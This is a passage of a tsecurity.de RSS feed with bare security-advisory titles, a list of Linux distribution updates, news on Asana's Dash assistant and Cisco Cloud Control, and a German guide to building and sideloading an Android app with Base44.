<guid isPermaLink="true">https://tsecurity.de/de/3576213/unix-server/security-preisgabe-von-informationen-in-perl-extutils-builder-compiler-fedora/</guid>
<pubDate>Fri, 05 Jun 2026 19:46:22 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (kernel), Debian (dovecot, exim4, frr, and haveged), Fedora (cockpit, freeipa, jpegxl, libre, nextcloud, perl-Cpanel-JSON-XS, perl-Crypt-Argon2, perl-Dist-Build, perl-ExtUtils-Builder, perl-ExtUtils-Builder-Compiler, perl-HTTP-Tiny, perl-libwww-perl,...]]></description>
<link>https://tsecurity.de/de/3575456/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575456/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 05 Jun 2026 15:10:00 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (kernel), <b>Debian</b> (dovecot, exim4, frr, and haveged), <b>Fedora</b> (cockpit, freeipa, jpegxl, libre, nextcloud, perl-Cpanel-JSON-XS, perl-Crypt-Argon2, perl-Dist-Build, perl-ExtUtils-Builder, perl-ExtUtils-Builder-Compiler, perl-HTTP-Tiny, perl-libwww-perl, python-starlette, rubygem-yard, rust-sequoia-cert-store, rust-sequoia-chameleon-gnupg, rust-sequoia-octopus-librnp, rust-sequoia-sop, rust-sequoia-sq, rust-sequoia-wot, samba, and transmission), <b>Red Hat</b> (image-builder), <b>Slackware</b> (dnsmasq and libinput), <b>SUSE</b> (evince, glibc, google-guest-agent, hplip, ignition, LibVNCServer, libzypp, libsolv, python-Pillow, salt, thunderbird, and vim), and <b>Ubuntu</b> (apache2, linux, linux-aws, linux-aws-5.15, linux-aws-fips, linux-fips, linux-gcp,
 linux-gcp-5.15, linux-gcp-fips, linux-gke, linux-gkeop, linux-hwe-5.15,
 linux-ibm, linux-ibm-5.15, linux-intel-iot-realtime, linux-intel-iotg,
 linux-kvm, linux-nvidia, linux-nvidia-tegra, linux-nvidia-tegra-5.15,
 linux-nvidia-tegra-igx, linux-oracle, linux-raspi, linux-realtime, linux, linux-aws, linux-aws-fips, linux-azure, linux-azure-5.4,
 linux-azure-fips, linux-bluefield, linux-fips, linux-gcp, linux-gcp-5.4,
 linux-gcp-fips, linux-iot, linux-kvm, linux-oracle, linux-oracle-5.4,
 linux-xilinx-zynqmp, linux, linux-azure, linux-azure-4.15, linux-azure-fips, linux-fips,
 linux-gcp-4.15, linux-gcp-fips, linux-kvm, linux-oracle, linux-aws-5.4, linux-hwe-5.4, linux-azure-fips, linux-fips, linux-raspi, linux-raspi-5.4, nano, postfix, robocode, tomcat6, tomcat7, and yard).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Preisgabe von Informationen in perl-ExtUtils-Builder-Compiler (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3574402/unix-server/security-preisgabe-von-informationen-in-perl-extutils-builder-compiler-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3574402/unix-server/security-preisgabe-von-informationen-in-perl-extutils-builder-compiler-fedora/</guid>
<pubDate>Fri, 05 Jun 2026 07:01:05 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Preisgabe von Informationen in perl-ExtUtils-Builder (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3574401/unix-server/security-preisgabe-von-informationen-in-perl-extutils-builder-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3574401/unix-server/security-preisgabe-von-informationen-in-perl-extutils-builder-fedora/</guid>
<pubDate>Fri, 05 Jun 2026 07:01:04 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Mehrere Probleme in image-builder (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3573789/it-security-nachrichten/mehrere-probleme-in-image-builder-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3573789/it-security-nachrichten/mehrere-probleme-in-image-builder-red-hat/</guid>
<pubDate>Thu, 04 Jun 2026 22:07:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in image-builder (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3573779/unix-server/security-mehrere-probleme-in-image-builder-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3573779/unix-server/security-mehrere-probleme-in-image-builder-red-hat/</guid>
<pubDate>Thu, 04 Jun 2026 22:01:15 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Asana launches AI ‘chief of staff’ to keep projects on track]]></title>
<description><![CDATA[Asana has launched an AI personal assistant that can track various data sources to alerts users when a work project runs into problems and recommends next actions.



It’s one of a range of product announcements made Thursday at the company’s Work Innovation Summit in London, including updates to...]]></description>
<link>https://tsecurity.de/de/3573261/it-nachrichten/asana-launches-ai-chief-of-staff-to-keep-projects-on-track/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3573261/it-nachrichten/asana-launches-ai-chief-of-staff-to-keep-projects-on-track/</guid>
<pubDate>Thu, 04 Jun 2026 18:17:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Asana has launched an AI personal assistant that can track various data sources to alerts users when a work project runs into problems and recommends next actions.</p>



<p>It’s one of a <a href="https://asana.com/press/releases/pr/asana-unveils-operating-system-for-human-agent-teams/f12f477a-7c35-4365-9771-578a294abc0d" target="_blank" rel="noreferrer noopener">range of product announcements</a> made Thursday at the company’s <a href="https://forum.asana.com/t/work-innovation-summit-london-june-4-2026/1135430" target="_blank" rel="noreferrer noopener">Work Innovation Summit</a> in London, including updates to its existing AI teammates product. These follow Asana’s recent <a href="https://www.businesswire.com/news/home/20260528515345/en/Asana-Acquires-StackAI-Adding-Cross-System-Execution-for-Human-Agent-Teams" target="_blank" rel="noreferrer noopener">acquisition of AI workflow automation software vendor StackAI</a> for $75 million.</p>



<p>Asana Dash is described as an “AI chief of staff” that can help users stay up to date on work projects by accessing information in Asana as well as across email, calendar and team messaging apps, said Arnab Bose, Asana’s chief product officer. “Keeping people in their ‘zone of genius’ and hooking up all of these unstructured signals to the structure of Asana — that’s what Dash does best,” said Bose.</p>



<p>The AI assistant can access the same Asana project information as the user, and can flag when problems occur that could push a project off-track. Dash can then act to address problems, such as posting messages within Asana on behalf of the user or directing an AI teammate to take action. (Dash will ask the user before making any changes.)</p>



<p>“Asana is building on recent acquisitions, and earlier investment in a graph database focused on human connections — the Asana Work Graph — and its position within a well-integrated flow of work to deliver to each worker an executive assistant rooted in the context of their job,” said Wayne Kurtzman, IDC research vice president.    </p>



<p>The Dash personal assistant is enabled by an expanded Asana work graph — the data model related to work carried out by teams in the application. Asana has in the past been more focused on tasks, projects, portfolios, and goals, said Bose, but the work graph now includes new sources of data, linking to employee calendars and accessing meeting transcripts, for instance, alongside other documents and databases.</p>



<p>There are also updates to the <a href="https://www.computerworld.com/article/4063082/asana-puts-ai-teammate-agents-to-work.html">AI teammates feature</a> — collaborative AI agents that multiple human coworkers can interact with — which are now more powerful, said Bose. This includes additional skills and integrations with third-party apps such as Gmail, Slack, Outlook, Figma, and Canva.</p>



<p>As for the StackAI acquisition, Bose said it allows Asana to extend the reach of AI agents into a variety of business apps more easily and reliably, building ] on Asana’s “system of action” function. The latter tracks work carried out across an organization, he said, and can automate the complex processes that make up many enterprise workflows. </p>



<p>“If you look at StackAI’s website, the thing that they are really, really great at is building these complex, multi-step processes,” said Bose. The aim is to combine StackAI’s agent builder with integration expertise agents already available in Asana. </p>



<p>“So, the idea is when an AI teammate or Dash recommends the next best action, they will be able to choose downstream actions based on the portfolio of approved workflows that you’ve built out in StackAI.”</p>



<p>Overall, the announcements help Asana provide a platform that combines agents and workflow automation with AI assistance that aids humans to work more effectively, said Bose.</p>



<p>“Our terminology for this is a ‘human-agent operating system,’ because automation, I feel, is a little reductive in the sense that there are some things that are fully automated, but a lot that you’d want a human being and an AI agent to coordinate on and align on,” he said.</p>



<p>Asana did not immediately respond to a request for pricing and availability details for Dash.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ich habe in 15 Minuten eine eigene Android-App programmiert: So geht’s]]></title>
<description><![CDATA[Braucht die Welt noch eine weitere Android-App? Das hängt vermutlich davon ab, was Sie entwickeln. Für alle, die darüber nachdenken, eine eigene App zu entwerfen, gibt es nach wie vor Ideen, die nicht durch klassische App-Entwickler ausgeschöpft wurden.



Glücklicherweise war es noch nie so einf...]]></description>
<link>https://tsecurity.de/de/3571632/windows-tipps/ich-habe-in-15-minuten-eine-eigene-android-app-programmiert-so-gehts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3571632/windows-tipps/ich-habe-in-15-minuten-eine-eigene-android-app-programmiert-so-gehts/</guid>
<pubDate>Thu, 04 Jun 2026 08:21:44 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Braucht die Welt noch eine weitere Android-App? Das hängt vermutlich davon ab, was Sie entwickeln. Für alle, die darüber nachdenken, eine eigene App zu entwerfen, gibt es nach wie vor Ideen, die nicht durch klassische App-Entwickler ausgeschöpft wurden.</p>



<p>Glücklicherweise war es noch nie so einfach, eine Android-App mit Tools wie <a href="https://gemini.google.com/">Google Gemini</a> und <a href="https://app.base44.com/">Base44</a> zu erstellen. Und das Beste daran? Sie können die App direkt auf Ihrem Android-Smartphone entwerfen und entwickeln, ohne dass dafür Programmierkenntnisse erforderlich sind. So geht’s.</p>



<h2 class="wp-block-heading">1. Entwickeln Sie eine Idee</h2>



<p>Dies ist vielleicht der schwierigste Schritt von allen, wenn man bedenkt, <a href="https://42matters.com/stats">dass es im Google Play Store schätzungsweise 2,3 Millionen Apps gibt</a>. Wählen Sie ein Thema, in dem der Wettbewerb zu groß ist, wird niemand die App herunterladen und nutzen. Finden Sie jedoch eine Idee, die bei einer Zielgruppe Anklang findet, könnte sie durchaus viral gehen.</p>



<p>Das muss nicht mal das Ziel sein, denn vielleicht brauchen Sie einfach eine App für ein spezielles Problem, für das es bisher keine Lösung gibt. Ganz nach dem Motto: Wenn ich es nicht tue, wer sonst?</p>



<p>Ich begann also damit, über eine Aufgabe nachzudenken, die ich als frustrierend empfinde: den Kauf eines neuen Autos. Ich bin auf der Suche nach einem Fahrzeug, das leichte Geländefahrten bewältigen kann, aber nicht allzu teuer ist. Ich beschloss, eine Idee für eine Android-App zu entwickeln, mit der ich während der Probefahrten „spontan“ Notizen machen kann.</p>



<p>Es stellte sich heraus, dass es viele Apps für den Autokauf gibt, aber die meisten davon ermöglichen nur die Suche nach einem Auto, nicht das Erstellen von Notizen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a21196630005"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/comeupwiththeidea.png?w=1200" alt="Android idea" class="wp-image-3147117" width="1200" height="549" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Google Gemini war sehr hilfreich bei der Ideenfindung</p></figcaption></figure><p class="imageCredit">John Brandon / Foundry</p></div>



<p>Ich habe Google Gemini genutzt, um einige Ideen anhand folgender Eingabe zu konkretisieren: „Welche Ideen gibt es für eine Android-App, die mir hilft, Notizen zum Autokauf zu machen? Ich möchte den Kilometerstand, die Marke und das Modell sowie alle weiteren Erkenntnisse notieren.“ </p>



<p>Zunächst machte Gemini einige technische Vorschläge zur Verwendung einer Markdown-Sprache (z. B. Apps, die jegliche Formatierung entfernen und zum Programmieren verwendet werden können), aber ich wollte diese Schritte überspringen. Ich stellte klar, dass ich lediglich App-Ideen wollte, und das funktionierte. </p>



<p>Gemini brachte mich dazu, über den Umfang der App nachzudenken und darüber, wie man sie nützlich und einfach gestalten könnte. Mit diesen Informationen im Gepäck stürzte ich mich in das Vibe-Coding.</p>



<h2 class="wp-block-heading">2. Erstellen Sie die Android-App mit einem KI-App-Builder</h2>



<p>Wie wir alle wissen, boomt die KI-Landschaft, und wir alle werden in unserer Freizeit zu „Prompt-Ingenieuren“. Es gibt unzählige KI-Apps, und einige davon sind technischer als andere. </p>



<p>Ich habe einen KI-App-Builder namens <a href="https://replit.com/">Replit</a> ausprobiert und schnell festgestellt, dass er für mich nicht geeignet war. Zudem müsste ich, um die App tatsächlich für den Google Play Store zu generieren, über gewisse Programmierkenntnisse verfügen.</p>



<p>Ich habe mich stattdessen für <a href="https://app.base44.com/">Base44</a> entschieden, da es noch einfacher zu bedienen ist. Und vor allem können Sie die Android-App über eine Website namens <a href="https://my.appmyweb.net/">AppMyWeb</a> ganz unkompliziert erstellen.</p>



<p>Nachdem ich mein Base44-Konto eingerichtet hatte, gab ich eine einfache Eingabe ein: „Erstellen Sie eine App für Android, mit der ich Notizen zu Autos machen kann, deren Kauf ich in Erwägung ziehe.“ </p>



<p>Ich dachte, der App-Generator würde mir Folgefragen stellen oder mich zwingen, mehr über Programmierung zu lernen. Stattdessen begann er einfach, die App zu erstellen, einschließlich der Benutzeroberfläche, und schlug sogar einen Namen vor (CarVault). </p>



<p>Base44 schien in der Lage zu sein, meine Gedanken zu lesen, und spiegelte im Grunde die Vorschläge von Gemini. Ich war beeindruckt davon, wie schnell Base44 arbeitete, während ich selbst überhaupt nichts tun musste.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a21196630c1a"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/maketheapp.png?w=1200" alt="Make an Android app" class="wp-image-3147118" width="1200" height="555" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Die einfache Benutzeroberfläche von Base44 macht die Nutzung sehr einfach</p></figcaption></figure><p class="imageCredit">John Brandon / Foundry</p></div>



<p>Nach etwa 10 Minuten zeigte mir Base44 die Ergebnisse, und ich war überwältigt. Ich hatte eine voll funktionsfähige App, mit der ich ein Foto hinzufügen, die Farbe und den Kilometerstand notieren und Testnotizen für jedes Auto hinzufügen konnte. </p>



<p>Normalerweise könnte man Base44 dann bitten, das Design anzupassen und weitere Funktionen hinzuzufügen, aber ich war mit den Ergebnissen zufrieden. Ich habe die webbasierte App mit einem Klick zum Testen veröffentlicht. Der gesamte Vorgang dauerte 15 Minuten. Die fertige webbasierte App können Sie <a href="https://car-vault-hq.base44.app/">hier</a> sehen.</p>



<h2 class="wp-block-heading">3. Testen Sie die Webversion Ihrer App</h2>



<p>Bevor Sie die Android-App erstellen, ist es wichtig, die Funktionen zu testen und sicherzustellen, dass alles funktioniert. </p>



<p>Ich entschied mich dafür, dies mithilfe der webbasierten App zu tun, da ich wusste, dass die mobile App im Grunde genauso funktionieren würde. Ich fügte weitere Autos hinzu, die ich teste, füllte weitere Felder mit Notizen aus und fügte Fotos hinzu.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a2119663161e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/testtheapp.png?w=1200" alt="Test the Android app" class="wp-image-3147120" width="1200" height="548" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">John Brandon / Foundry</p></div>



<p>Alles funktionierte einwandfrei, aber hätte es einen Fehler gegeben, hätte ich mich an Base44 wenden können, um Korrekturen vornehmen zu lassen. Nehmen wir zum Beispiel an, die Funktion zum Hochladen von Fotos hätte nicht funktioniert. Ich hätte dann schreiben können: „Die Funktion zum Hochladen von Fotos funktioniert nicht. Können Sie das beheben?“ Base44 hätte dann interne Überprüfungen durchgeführt, um das Problem für mich zu lösen. Das ist beeindruckend.</p>



<h2 class="wp-block-heading">4. Starten Sie die App</h2>



<p>Natürlich wollte ich eine Android-App für mein Smartphone, keine webbasierte App. Ich war auch nicht besonders daran interessiert, die App öffentlich zu veröffentlichen, da ich sie hauptsächlich für meine eigene Recherche zum Autokauf nutzen wollte. </p>



<p>Jeder Android-Nutzer kann sich jedoch <a href="https://play.google.com/console/u/0/signup">für ein Entwicklerkonto im Google Play Store anmelden</a> und eine eigene App veröffentlichen. Der Haken daran ist, dass eine einmalige Aktivierungsgebühr von 25 Euro anfällt.</p>



<p>Anstatt die App öffentlich zu veröffentlichen, beschloss ich, sie auf ein Samsung Galaxy S26 zu sideloaden und lokal auszuführen, anstatt sie in den Google Play Store aufzunehmen. Zunächst musste ich meine Web-App also in eine mobile App umwandeln. Glücklicherweise ist auch das ganz einfach. </p>



<p>Ich habe <a href="https://my.appmyweb.net/">AppMyWeb</a> verwendet, das für ein Abonnement 39 Dollar pro Monat berechnet, aber <a href="https://median.co/">Median.co</a> ist eine gute kostenlose Alternative, wenn Sie (wie ich) die App nicht öffentlich herausbringen möchten.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a21196631f44"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/vibe-coded-android-app.jpg?quality=50&amp;strip=all" alt="Android app vibe coded" class="wp-image-3151505" width="1024" height="576" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>CarVault sieht genauso aus wie jede andere Android-App</p></figcaption></figure><p class="imageCredit">John Brandon / Foundry</p></div>



<p>Bei AppMyWeb ist der Vorgang schnell und einfach. Ich habe der App einen Namen gegeben, einen Link zur webbasierten Base44-App hinzugefügt und eine Versionsnummer ausgewählt. Vor der Generierung verlangt AppMyWeb eine App-„Signatur“, die den Nutzern hilft, den Entwickler zu identifizieren. Ich habe eine mit meinem Namen erstellt, was unkompliziert und schnell ging.</p>



<p>Anschließend habe ich die Android-App generiert und die APK-Datei heruntergeladen, doch es war noch ein weiterer Schritt erforderlich. Um eine APK auf einem Android-Smartphone zu installieren, müssen Sie die Berechtigung zum Installieren unbekannter Apps erteilen. </p>



<p>Auf einem Smartphone wie dem Galaxy S26 wählen Sie unter „Einstellungen“ einfach „Apps“ aus. Gehen Sie zum Drei-Punkte-Menü, wählen Sie „Sonderzugriff“ und anschließend „Unbekannte Apps installieren“. Aktivieren Sie „Google Drive“ und „Meine Dateien“, wo Sie die APK-Datei laden können. Laden Sie die App auf das Smartphone herunter oder greifen Sie über Google Drive darauf zu und installieren Sie die App anschließend. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a211966327a8"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/samsung-install-unknown-apps.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Install unknown apps settings Samsung phone" class="wp-image-3151495" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Standardmäßig blockieren die meisten Android-Smartphones Apps aus allen Quellen außer offiziellen Stores</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Das war’s schon! Ich hatte eine voll funktionsfähige Android-App, und die Erstellung dauerte nur 15 Minuten. Nun musste ich nur noch die Entscheidung treffen, welches Auto ich kaufen möchte.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Building the foundation for the agentic enterprise]]></title>
<description><![CDATA[Enterprise IT teams, the invisible force driving our modern work world, are struggling to manage environments that have become staggeringly complex, spanning thousands of devices, multiple security domains, and a patchwork of disconnected management tools.



This fragmentation runs across networ...]]></description>
<link>https://tsecurity.de/de/3570344/it-security-nachrichten/building-the-foundation-for-the-agentic-enterprise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3570344/it-security-nachrichten/building-the-foundation-for-the-agentic-enterprise/</guid>
<pubDate>Wed, 03 Jun 2026 18:50:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Enterprise IT teams, the invisible force driving our modern work world, are struggling to manage environments that have become staggeringly complex, spanning thousands of devices, multiple security domains, and a patchwork of disconnected management tools.</p>



<p>This fragmentation runs across networking, security, infrastructure, observability, and collaboration systems and creates significant operational risk. When teams must act and defend infrastructure at machine speed and scale, yet manually stitch together context across siloed workflows, visibility suffers, response times slow, and the burden on already-stretched staff compounds, making it increasingly difficult to scale both human expertise and agentic automation.<br><br>These challenges are becoming more urgent as enterprises increasingly adopt AI and seek to gain the value of agentic operations. For human operators and AI agents to work together effectively, they need more than access to the same environment; they need a shared operational foundation that gives access to the same context, the same signals, and the same system of action across domains.</p>



<p>That foundation ensures that AI is no longer constrained by the fragmentation that limits scale and innovation, said Munish Mehta, senior director of networking at AMD, in this interview during Cisco Live:</p>



<figure class="wp-block-embed is-type-rich is-provider-embed-handler wp-block-embed-embed-handler"><div class="wp-block-embed__wrapper youtube-video">
https://youtube.com/watch?v=qc1YPrERGuU%3Fsi%3DLV4LsUrxuZ1Q8G0a
</div></figure>



<p>Cisco Cloud Control is that foundation. It’s a unified platform built to give both human operators and AI agents shared operational context across every IT domain. It consolidates identity, governance, and administration so that networking, security, and observability share a common management experience rather than separate consoles.</p>



<p>Cisco Cloud Control is built for an open ecosystem, extending to more than 50 platforms and tools such as AWS, Google Cloud, Linear, Microsoft and ServiceNow. New capabilities like App Builder, leveraging built-in agentic coding assistant OpenAI Codex, further expands what teams can create and manage over time. Designed to evolve with an organization’s operational maturity, Cisco Cloud Control becomes more valuable as teams adopt more of its capabilities, said DJ Sampath, senior vice president and general manager of Cisco AI Platform and Software, in this interview during Cisco Live:</p>



<figure class="wp-block-embed is-type-rich is-provider-embed-handler wp-block-embed-embed-handler"><div class="wp-block-embed__wrapper youtube-video">
https://youtube.com/watch?v=n9ZAOGONfyk%3Fsi%3Du2T35La8Em3mkshl
</div></figure>



<p>Central to Cisco Cloud Control is an operating model called AgenticOps, which is built on the premise that AI agents and human operators are most effective when they work together in a shared workspace rather than in parallel silos. That collaboration environment is called AI Canvas, and it surfaces cross-domain telemetry, connects teams and brings agents into a shared view so that investigations, remediations, and approvals happen in one place rather than across a chain of handoffs.</p>



<p>For example, new agentic loop automation can identify root causes and propose actions, while human operators retain oversight and approval authority before anything is executed. Anurag Dhingra, senior vice president and general manager of enterprise connectivity and collaboration at Cisco, offered further context during this interview at Cisco Live:</p>



<figure class="wp-block-embed is-type-rich is-provider-embed-handler wp-block-embed-embed-handler"><div class="wp-block-embed__wrapper youtube-video">
https://youtube.com/watch?v=ohcrPV7yl0c%3Fsi%3DEkbvU5iQ_oVm9N-k
</div></figure>



<p>As AI moves from experimentation to operational reality, the organizations that will capture the most value are those that invest in the foundational layer that makes coordinated, trustworthy automation possible. Cisco Cloud Control’s unified platform approach, AgenticOps framework, and open integration architecture give enterprise IT teams and AI agents the shared context they need to operate as genuine partners rather than disconnected actors working in adjacent silos.</p>



<p>And for CIOs navigating the growing complexity of their IT environments with finite resources, this unified foundation lays the groundwork for enabling current and future AI innovation. Unified operations reduces the overhead associated with managing fragmented systems, and ensures that security and networking teams are working from the same operational picture.</p>



<p>Taken together, Cisco Cloud Control allows organizations to move from isolated automation and AI efforts to repeatable, scalable AI-powered operations.</p>



